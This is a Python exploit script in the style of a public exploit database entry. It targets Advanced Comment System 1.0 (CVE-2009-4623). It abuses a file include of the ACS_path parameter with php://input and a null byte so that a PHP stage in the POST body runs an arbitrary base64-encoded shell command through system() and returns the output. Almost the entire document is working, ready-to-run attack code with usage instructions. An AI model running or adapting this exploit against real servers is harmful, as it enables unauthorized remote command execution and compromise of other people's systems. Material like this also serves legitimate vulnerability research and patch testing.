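#!/usr/bin/env python3
# Exploit Title: Advanced Comment System 1.0 - Remote Command Execution (RCE)
# Date: August 19, 2022
# Exploit Author: hupe1980
# Version: Advanced Comment System 1.0
# Tested on: Linux
# CVE: CVE-2009-4623
"""Command execution against Advanced Comment System 1.0 (CVE-2009-4623).

``advanced_comment_system/index.php`` feeds the ``ACS_path`` request parameter
into a file include.  Sending ``php://input`` as that path makes PHP execute
the raw POST body as source, so the body carries (a) the base64-encoded command
in the ``cbcmd`` form field and (b) a small PHP stage that prints a random
delimiter followed by the command's output.  The client then cuts the response
at that delimiter to recover the output.  The trailing ``%00`` is a null byte,
presumably meant to truncate whatever the application appends to the path.

Usage: ``exploit.py <target> <cmd>``   e.g. ``exploit.py http://127.0.0.1 "uname -a"``
"""
import base64
import random
import sys
from typing import Optional
from urllib.parse import quote

try:
    import requests
except ImportError:  # reported with an actionable message when exploit() runs
    requests = None

# Alphabet for the response delimiter; the delimiter only has to be unlikely to
# occur naturally in the page, it is not a secret, so ``random`` is adequate.
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
# Seconds to wait for the target before giving up (the original call had no
# timeout and would hang forever on a silent host).
DEFAULT_TIMEOUT = 30


def generate_string(size: int) -> str:
    """Return ``size`` random characters drawn from ``ALPHABET`` (``""`` for 0)."""
    return "".join(random.choice(ALPHABET) for _ in range(size))


def build_payload(cmd: bytes, delimiter: bytes) -> bytes:
    """Build the urlencoded POST body for one command.

    Args:
        cmd: shell command to run on the target, as bytes.
        delimiter: marker the PHP stage echoes in front of the command output.

    Returns:
        ``ACS_path=php://input%00&cbcmd=<b64>&<php stage>``.  The base64 value is
        percent-encoded because the body is ``application/x-www-form-urlencoded``:
        a raw ``+`` in base64 would be decoded by PHP as a space and corrupt the
        command before ``base64_decode`` sees it.
    """
    encoded_cmd = quote(base64.b64encode(cmd), safe="").encode()
    # PHP executes the whole body: the urlencoded prefix is echoed verbatim,
    # then this stage prints "<delimiter>: " and the command output, which is
    # what parse_output() looks for.
    stage = (
        b'<?php echo "' + delimiter + b': "; '
        b'system(base64_decode($_POST["cbcmd"])); ?>'
    )
    return b"ACS_path=php://input%00&cbcmd=" + encoded_cmd + b"&" + stage


def parse_output(text: str, delimiter: str) -> Optional[str]:
    """Return everything after ``"<delimiter>: "`` in ``text``.

    Returns ``None`` when the marker is absent (the stage did not execute),
    and ``""`` when it is present but the command produced no output.
    """
    marker = f"{delimiter}: "
    position = text.find(marker)
    if position < 0:
        return None
    return text[position + len(marker):]


def exploit(target: str, cmd: bytes, timeout: float = DEFAULT_TIMEOUT) -> None:
    """POST the payload to ``target`` and print the command output.

    Args:
        target: base URL of the site (no trailing slash), e.g. ``http://host``.
        cmd: command to run, as bytes.
        timeout: per-request timeout in seconds passed to ``requests``.

    Exits the process on a missing ``requests`` package, on a transport error,
    or on Ctrl-C.  Prints a diagnostic when the delimiter is not found, so a
    non-vulnerable target is distinguishable from a command with no output.
    """
    if requests is None:
        sys.exit("python-requests is required: pip install requests")
    url = f"{target}/advanced_comment_system/index.php"
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    delimiter = generate_string(6)
    body = build_payload(cmd, delimiter.encode())
    try:
        result = requests.post(url=url, headers=headers, data=body, timeout=timeout)
    except KeyboardInterrupt:
        print("Keyboard interrupt detected.")
        sys.exit()
    except requests.exceptions.RequestException as exc:
        sys.exit(f"Request to {url} failed: {exc}")

    output = parse_output(result.text, delimiter)
    if output is None:
        print(
            f"Delimiter not found in response (HTTP {result.status_code}); "
            "the PHP stage did not run -- target may not be vulnerable"
        )
    elif output:
        print(output)
    else:
        print(f"No output from command '{cmd.decode(errors='replace')}'")
    print(f"Response size from target host: {len(result.text)} bytes")


def main() -> None:
    """Parse ``<target> <cmd...>`` from argv and run the exploit once."""
    if len(sys.argv) < 3:
        prog = sys.argv[0]
        print(f"(+) usage: {prog} <target> <cmd>")
        print(f'(+) eg: {prog} http://127.0.0.1 "uname -a"')
        sys.exit(-1)
    target = sys.argv[1].rstrip("/")
    # Everything after the target is the command, so quoting is optional.
    cmd = " ".join(sys.argv[2:]).encode()
    exploit(target, cmd)


if __name__ == "__main__":
    main()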